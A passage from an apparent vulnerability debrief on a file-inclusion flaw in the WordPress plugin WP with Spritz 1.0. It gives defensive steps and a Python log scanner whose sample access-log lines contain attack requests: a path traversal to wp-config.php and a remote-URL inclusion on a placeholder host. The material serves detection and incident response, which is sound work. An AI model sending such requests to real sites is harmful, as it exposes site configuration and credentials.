PatchSiren

PatchSiren cyber security CVE debrief

CVE-2018-25329 Unknown Vendor CVE debrief

CVE-2018-25329 describes an unauthenticated remote file inclusion issue in the WordPress plugin WP with Spritz 1.0. The reported impact is arbitrary file access by injecting a file path into the url parameter sent to wp.spritz.content.filter.php, which can expose configuration data and credentials. The record is rated HIGH severity in the supplied corpus (CVSS 8.7).

Vendor: Unknown Vendor
Product: Unknown
CVSS: HIGH 8.7
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-05-17
Original CVE updated: 2026-05-18
Advisory published: 2026-05-17
Advisory updated: 2026-05-18

Who should care

Site owners, WordPress administrators, managed hosting teams, and responders who operate or support installations that may include the WP with Spritz plugin. Security teams should treat this as especially important on internet-facing WordPress instances or any environment where plugin access is not tightly controlled.

Technical summary

The supplied description says the vulnerable code path accepts attacker-controlled file locations through the url parameter and can be reached without authentication via GET requests to wp.spritz.content.filter.php. That behavior aligns with CWE-98 (improper control of a filename for include/require) and can result in remote file inclusion or local file disclosure. The NVD record in the corpus marks the issue as network-reachable, unauthenticated, and high-confidentiality impact, with no integrity or availability impact asserted in the provided CVSS vector.

Defensive priority

High; urgent if WP with Spritz 1.0 is installed, reachable, or was previously exposed.

Recommended defensive actions

  • Identify whether WP with Spritz is installed anywhere in your WordPress estate, including archived, staging, and customer-managed sites.
  • Remove or disable WP with Spritz 1.0 immediately; if the plugin is no longer maintained, plan replacement rather than continued use.
  • Inspect web logs and application telemetry for requests to wp.spritz.content.filter.php and unusual url parameter values.
  • Assume sensitive files may have been exposed if the plugin was reachable; review for leaked configuration, secrets, and credential reuse.
  • Rotate credentials and keys that may have been present in exposed WordPress or server configuration files.
  • Apply compensating controls such as restricting access to the affected endpoint until removal is completed.
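
The log review in the actions above can be automated. The following scanner is an added example for this debrief, not PatchSiren tooling or code from the plugin; it assumes Apache/nginx combined-format access logs, uses constructed sample lines with placeholder addresses, and the labels it assigns to url values are this example's own heuristics for the CWE-98 patterns the technical summary describes.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "wp.spritz.content.filter.php"
# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)

# Constructed sample lines (placeholder IPs, agents and paths; not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [17/May/2026:10:01:12 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../../wp-config.php HTTP/1.1" 200 2210 "-" "curl/8.0"
198.51.100.7 - - [17/May/2026:10:01:15 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 120 "-" "curl/8.0"
203.0.113.9 - - [17/May/2026:10:02:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [17/May/2026:10:02:03 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

def classify_url_value(value: str) -> str:
    """Label a decoded url parameter value by the CWE-98 pattern it resembles."""
    if "\x00" in value or value.startswith("/") or TRAVERSAL_RE.search(value):
        return "local-file"   # traversal or absolute path: local file disclosure
    if value.lower().startswith(("http://", "https://")):
        return "remote"       # remote URL: candidate remote file inclusion
    if SCHEME_RE.match(value):
        return "wrapper"      # php://, file://, data: ... (also catches "C:\" paths)
    return "other"            # relative name: still worth review, lower confidence

def scan_access_log(text: str) -> list:
    """Return one finding per url value sent to the affected endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes once; double-encoded values land in "other".
        values = parse_qs(parts.query, keep_blank_values=True).get("url") or [""]
        for v in values:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": m.group("status"), "url": v,
                             "label": "no-url" if v == "" else classify_url_value(v)})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['label']:<10} url={f['url']!r}")
```

Every hit on the endpoint is reported, including requests with no url value, because the page's guidance is to review all traffic to it; the label only orders the review.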

Evidence notes

The corpus ties this CVE to WP with Spritz 1.0 and states that unauthenticated GET requests to wp.spritz.content.filter.php with malicious url values can be used to read arbitrary files. NVD metadata in the corpus lists CWE-98 and a CVSS 4.0 vector with network attack vector, no privileges, no user interaction, and high confidentiality impact. The vendor identity is low-confidence in the supplied data, so the safest framing is to describe the affected product as the WordPress plugin WP with Spritz rather than asserting a stronger vendor attribution. The dates provided in this corpus are record publication/modification timestamps and should be treated as disclosure-record timing, not as the original exploit discovery date.

Official resources

This debrief is based only on the supplied corpus and official links. The corpus dates reflect the vulnerability record's published/modified timestamps, not the original vulnerability discovery date. No exploit code or reproduction steps are